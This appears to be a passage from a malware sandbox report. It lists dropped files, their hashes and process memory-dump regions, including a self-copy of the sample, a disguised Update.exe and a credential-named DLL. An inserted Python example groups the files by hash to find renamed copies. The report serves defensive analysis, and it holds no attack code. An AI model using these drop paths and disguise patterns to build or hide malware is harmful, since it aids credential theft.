  SHA512: 925ad9dbe1681a3494450978217c0dd98b637e681a9713280756908f444bef95cf9b9649aa80383561ec59b5951885901b16227e9853c1111a4271ab8e1d0b67

C:\Users\Admin\AppData\Local\Temp\1000013001\build333333.exe (listed twice with identical hashes)
  Filesize: 2.9MB
  MD5: c9c15c4061ab4de4cb7c473c2760f923
  SHA1: e64cbcd186178d44a1e8584c417b7d865417be0b
  SHA256: d8e22530aa884e9e742a102f9acb53a2727b749dac4489c72b37782e2ec6383e
  SHA512: 6fe139e6e5d7923b932938acfd32b041fb16dac5945c50ef81a5dd61563d0faf1ef1a97db28a9f23a40abfe2fe78f756477157a13b217f6cf199a5ec122ab367

C:\Users\Admin\AppData\Local\Temp\1000019001\USBtoISOConverter.exe (listed twice with identical hashes)
  Filesize: 252KB
  MD5: b9a11bdb88d21c6bbd5b575c96548075
  SHA1: c5096e8854febffcb65da55d2ee0b8ab6fc3c5e7
  SHA256: 234b2eb65c442967ece3d92c1eb1c9c42a4a5ae6ea7e445a0994b746f656d8e3
  SHA512: 35494ed5e5de8fbc76f5969c3e7473f43ac8ea5a027a8329607accf2668a8fb70e2e04019689e5bc10bb104abf3e5eea3aa11815a3cae8cb41f382288e9ef9a2

C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exe (listed four times with identical hashes; byte-identical to the submitted sample)
  Filesize: 332KB
  MD5: 31d0310cd3d6d5e2e7c51508c12b25dd
  SHA1: c19664c55ede5d5411d348fae4832823b7085086
  SHA256: 880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6
  SHA512: 2015f457aa5daa7ce8460c954243184ec77187f1ad1d997167074f84a3d31b32bf55be08b0d6043f20ddee289e93809150cc0b966e277fa7d66fdb92d10b1c9c

C:\Users\Admin\AppData\Local\Temp\b556d5b16e\orxds.exe (listed twice; same hashes as C:\ProgramData\Update.exe)
  Filesize: 218KB
  MD5: 9512d156c84429d1854ac514ed428f22
  SHA1: 7b92f647f9606c3574b0ffb7d35a9a877ad1e18e
  SHA256: 5e19869a01fa927d8cca4183f640e6ac75d28e99e4f9084d5b3bbd8b5341cef4
  SHA512: 79a70c383eb2604d4a1cc67665f766d1e5ea45eb1e9e571c7f7fa86748037343b800bd1bb96e65dea9ee7bf50e28984cbd1be257590befd7977814ec12513855

C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPL (also recorded three times as uQwk5O.cpl, identical hashes)
  Filesize: 2.8MB
  MD5: 9859329af700af2cca4623587c54118f
  SHA1: db96dc960469d7af6b01e3369db73469fcfb543f
  SHA256: 576d096f85e718193c3d14b828e2ab7d15edbbc996083a3b2d682bf93228f3ce
  SHA512: 9472183a6a64d34b13f07501accb22f44ce7364e10b755c0b056987efe507b8168364496d154b81ff92e603c2f7558491ba22ef56677ec69e4faca65c852895f

C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll (listed three times with identical hashes)
  Filesize: 126KB
  MD5: 98cc0f811ad5ff43fedc262961002498
  SHA1: 37e48635fcef35c0b3db3c1f0c35833899eb53d8
  SHA256: 62d5b300b911a022c5c146ea010769cd0c2fdcc86aba7e5be25aff1f799220be
  SHA512: d2ae90628acf92c6f7d176a4c866a0b6a6cfcfd722f0aec89cb48afead4318311c3ca95fe6865ac254b601b70ef5f289a35f4b26fba67a4c9b3cc5e68c7bf9c1
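Several files in this section share hashes under different names. As an added example, not part of the report, the Python below parses a constructed excerpt of the section in the fused form the text extraction produced (label and value run together, one "-" between entries) and groups the files by SHA256. Run on these entries it shows that C:\ProgramData\Update.exe and orxds.exe are one binary and that gntuud.exe is a byte-identical copy of the submitted sample; the two spellings of the .cpl collapse because paths are compared case-insensitively. SAMPLE_SHA256 is taken from the General section; the parser and its strictness about hash lengths are the example's own choices.

```python
"""Parse the fused Downloads table of a sandbox report and group dropped
files by SHA256 to find renamed copies.

Added example, not part of the original report. RAW is a constructed
subset of this report's Downloads section in its extracted form.
"""
import re
from collections import defaultdict

# SHA256 of the submitted sample, from the General section of the report.
SAMPLE_SHA256 = "880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6"

RAW = r"""
C:\ProgramData\Update.exeFilesize
218KB
MD59512d156c84429d1854ac514ed428f22
SHA17b92f647f9606c3574b0ffb7d35a9a877ad1e18e
SHA2565e19869a01fa927d8cca4183f640e6ac75d28e99e4f9084d5b3bbd8b5341cef4
SHA51279a70c383eb2604d4a1cc67665f766d1e5ea45eb1e9e571c7f7fa86748037343b800bd1bb96e65dea9ee7bf50e28984cbd1be257590befd7977814ec12513855
-
C:\Users\Admin\AppData\Local\Temp\99e342142d\gntuud.exeFilesize
332KB
MD531d0310cd3d6d5e2e7c51508c12b25dd
SHA1c19664c55ede5d5411d348fae4832823b7085086
SHA256880e9eea4648fcbfec55274bada4011702cb3ae1f549d83518a0f33baa1881c6
SHA5122015f457aa5daa7ce8460c954243184ec77187f1ad1d997167074f84a3d31b32bf55be08b0d6043f20ddee289e93809150cc0b966e277fa7d66fdb92d10b1c9c
-
C:\Users\Admin\AppData\Local\Temp\b556d5b16e\orxds.exeFilesize
218KB
MD59512d156c84429d1854ac514ed428f22
SHA17b92f647f9606c3574b0ffb7d35a9a877ad1e18e
SHA2565e19869a01fa927d8cca4183f640e6ac75d28e99e4f9084d5b3bbd8b5341cef4
SHA51279a70c383eb2604d4a1cc67665f766d1e5ea45eb1e9e571c7f7fa86748037343b800bd1bb96e65dea9ee7bf50e28984cbd1be257590befd7977814ec12513855
-
C:\Users\Admin\AppData\Local\Temp\uQwK5O.CPLFilesize
2.8MB
MD59859329af700af2cca4623587c54118f
SHA1db96dc960469d7af6b01e3369db73469fcfb543f
SHA256576d096f85e718193c3d14b828e2ab7d15edbbc996083a3b2d682bf93228f3ce
SHA5129472183a6a64d34b13f07501accb22f44ce7364e10b755c0b056987efe507b8168364496d154b81ff92e603c2f7558491ba22ef56677ec69e4faca65c852895f
-
C:\Users\Admin\AppData\Local\Temp\uQwk5O.cplFilesize
2.8MB
MD59859329af700af2cca4623587c54118f
SHA1db96dc960469d7af6b01e3369db73469fcfb543f
SHA256576d096f85e718193c3d14b828e2ab7d15edbbc996083a3b2d682bf93228f3ce
SHA5129472183a6a64d34b13f07501accb22f44ce7364e10b755c0b056987efe507b8168364496d154b81ff92e603c2f7558491ba22ef56677ec69e4faca65c852895f
-
C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dllFilesize
126KB
MD598cc0f811ad5ff43fedc262961002498
SHA137e48635fcef35c0b3db3c1f0c35833899eb53d8
SHA25662d5b300b911a022c5c146ea010769cd0c2fdcc86aba7e5be25aff1f799220be
SHA512d2ae90628acf92c6f7d176a4c866a0b6a6cfcfd722f0aec89cb48afead4318311c3ca95fe6865ac254b601b70ef5f289a35f4b26fba67a4c9b3cc5e68c7bf9c1
"""

ENTRY_RE = re.compile(r"^(?P<path>.+)Filesize$")
# Label and digest are fused ("SHA17b92..."); the fixed digest lengths below
# disambiguate SHA1 from SHA256/SHA512 when the digest itself starts with a digit.
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)([0-9a-fA-F]+)$")
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


def parse_downloads(raw):
    """Return one dict per entry: path, size, md5, sha1, sha256, sha512."""
    entries, cur = [], None
    for line in raw.strip().splitlines():
        line = line.strip()
        m = ENTRY_RE.match(line)
        if m:
            cur = {"path": m["path"], "size": None}
            entries.append(cur)
            continue
        if cur is None or line == "-":
            continue
        h = HASH_RE.match(line)
        if h:
            if len(h[2]) != HASH_LEN[h[1]]:
                raise ValueError(f"{h[1]} digest of wrong length: {line}")
            cur[h[1].lower()] = h[2].lower()
        elif cur["size"] is None:
            cur["size"] = line
    return entries


def group_by_sha256(entries):
    groups = defaultdict(list)
    for e in entries:
        groups[e["sha256"]].append(e["path"])
    return groups


def renamed_copies(entries):
    """SHA256 -> sorted distinct paths, for digests seen under more than one
    path. Paths are compared case-insensitively, as NTFS does."""
    out = {}
    for sha, paths in group_by_sha256(entries).items():
        distinct = {p.lower(): p for p in paths}
        if len(distinct) > 1:
            out[sha] = sorted(distinct.values())
    return out


def self_copies(entries, sample_sha256=SAMPLE_SHA256):
    """Dropped files that are byte-identical to the submitted sample."""
    return [e["path"] for e in entries if e["sha256"] == sample_sha256]


if __name__ == "__main__":
    entries = parse_downloads(RAW)
    for sha, paths in renamed_copies(entries).items():
        print(f"{sha[:12]}... seen as: {', '.join(paths)}")
    print("self-copies of the sample:", self_copies(entries))
```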
memory/228-145-0x00000000006EC000-0x000000000070B000-memory.dmp  124KB
memory/228-146-0x0000000000400000-0x000000000047B000-memory.dmp  492KB
memory/732-210-0x0000000000000000-mapping.dmp
memory/732-214-0x00007FFDF4860000-0x00007FFDF5321000-memory.dmp  10.8MB
memory/732-213-0x00007FFDF4860000-0x00007FFDF5321000-memory.dmp  10.8MB
memory/752-193-0x0000000000400000-0x000000000047B000-memory.dmp  492KB
memory/752-192-0x00000000005DC000-0x00000000005FB000-memory.dmp  124KB
memory/792-206-0x0000000002DF0000-0x0000000002F04000-memory.dmp  1.1MB
memory/792-191-0x0000000002DF0000-0x0000000002F04000-memory.dmp  1.1MB
memory/792-199-0x0000000002F10000-0x0000000003001000-memory.dmp  964KB
memory/792-190-0x0000000002A50000-0x0000000002CC6000-memory.dmp  2.5MB
memory/792-189-0x0000000002400000-0x00000000026C8000-memory.dmp  2.8MB
memory/792-203-0x00000000008B0000-0x0000000000989000-memory.dmp  868KB
memory/792-186-0x0000000000000000-mapping.dmp
memory/1220-136-0x0000000000000000-mapping.dmp
memory/1220-139-0x00000000007F8000-0x0000000000817000-memory.dmp  124KB
memory/1220-140-0x0000000000400000-0x000000000047B000-memory.dmp  492KB
memory/1244-156-0x0000000000000000-mapping.dmp
memory/1244-195-0x00000000053E0000-0x0000000005446000-memory.dmp  408KB
memory/1244-166-0x0000000005590000-0x0000000005BA8000-memory.dmp  6.1MB
memory/1244-197-0x00000000065B0000-0x0000000006B54000-memory.dmp  5.6MB
memory/1244-196-0x0000000005F60000-0x0000000005FF2000-memory.dmp  584KB
memory/1244-225-0x0000000007090000-0x00000000075BC000-memory.dmp  5.2MB
memory/1244-165-0x0000000000680000-0x00000000006B2000-memory.dmp  200KB
memory/1244-223-0x0000000006340000-0x0000000006502000-memory.dmp  1.8MB
memory/1244-167-0x0000000005110000-0x000000000521A000-memory.dmp  1.0MB
memory/1244-172-0x00000000050A0000-0x00000000050DC000-memory.dmp  240KB
memory/1244-170-0x0000000005040000-0x0000000005052000-memory.dmp  72KB
memory/1268-220-0x00007FFDF4860000-0x00007FFDF5321000-memory.dmp  10.8MB
memory/1268-216-0x0000000000000000-mapping.dmp
memory/1268-224-0x00007FFDF4860000-0x00007FFDF5321000-memory.dmp  10.8MB
memory/1272-173-0x0000000000000000-mapping.dmp
memory/1508-181-0x0000000000000000-mapping.dmp
memory/2032-215-0x0000000000000000-mapping.dmp
memory/2044-226-0x0000000000000000-mapping.dmp
memory/2192-221-0x0000000000000000-mapping.dmp
memory/2600-227-0x0000000000000000-mapping.dmp
memory/2616-143-0x0000000000000000-mapping.dmp
memory/2908-169-0x0000000003650000-0x0000000003764000-memory.dmp  1.1MB
memory/2908-194-0x0000000003650000-0x0000000003764000-memory.dmp  1.1MB
memory/2908-182-0x0000000003890000-0x0000000003969000-memory.dmp  868KB
memory/2908-174-0x0000000003780000-0x0000000003871000-memory.dmp  964KB
memory/2908-161-0x0000000000000000-mapping.dmp
memory/2908-168-0x00000000032B0000-0x0000000003526000-memory.dmp  2.5MB
memory/3368-171-0x0000000000000000-mapping.dmp
memory/3680-147-0x0000000000000000-mapping.dmp
memory/3684-159-0x0000000000000000-mapping.dmp
memory/3700-155-0x0000000000000000-mapping.dmp
memory/3724-154-0x0000000000A90000-0x0000000000AB4000-memory.dmp  144KB
memory/3724-150-0x0000000000000000-mapping.dmp
memory/3816-230-0x0000000000000000-mapping.dmp
memory/3852-207-0x0000000000000000-mapping.dmp
memory/4200-198-0x0000000000000000-mapping.dmp
memory/4356-201-0x00000176EB830000-0x00000176EB852000-memory.dmp  136KB
memory/4356-208-0x00007FFDF4860000-0x00007FFDF5321000-memory.dmp  10.8MB
memory/4356-200-0x0000000000000000-mapping.dmp
memory/4356-202-0x00007FFDF4860000-0x00007FFDF5321000-memory.dmp  10.8MB
memory/4388-180-0x0000000000000000-mapping.dmp
memory/4548-176-0x0000000000000000-mapping.dmp
memory/4576-175-0x0000000000000000-mapping.dmp
memory/4808-135-0x0000000000400000-0x000000000047B000-memory.dmp  492KB
memory/4808-142-0x0000000000400000-0x000000000047B000-memory.dmp  492KB
memory/4808-141-0x0000000000480000-0x0000000000580000-memory.dmp  1024KB
memory/4808-134-0x00000000021B0000-0x00000000021EE000-memory.dmp  248KB
memory/4808-133-0x0000000000480000-0x0000000000580000-memory.dmp  1024KB
memory/5040-209-0x0000000000000000-mapping.dmp
memory/5048-185-0x0000000000000000-mapping.dmp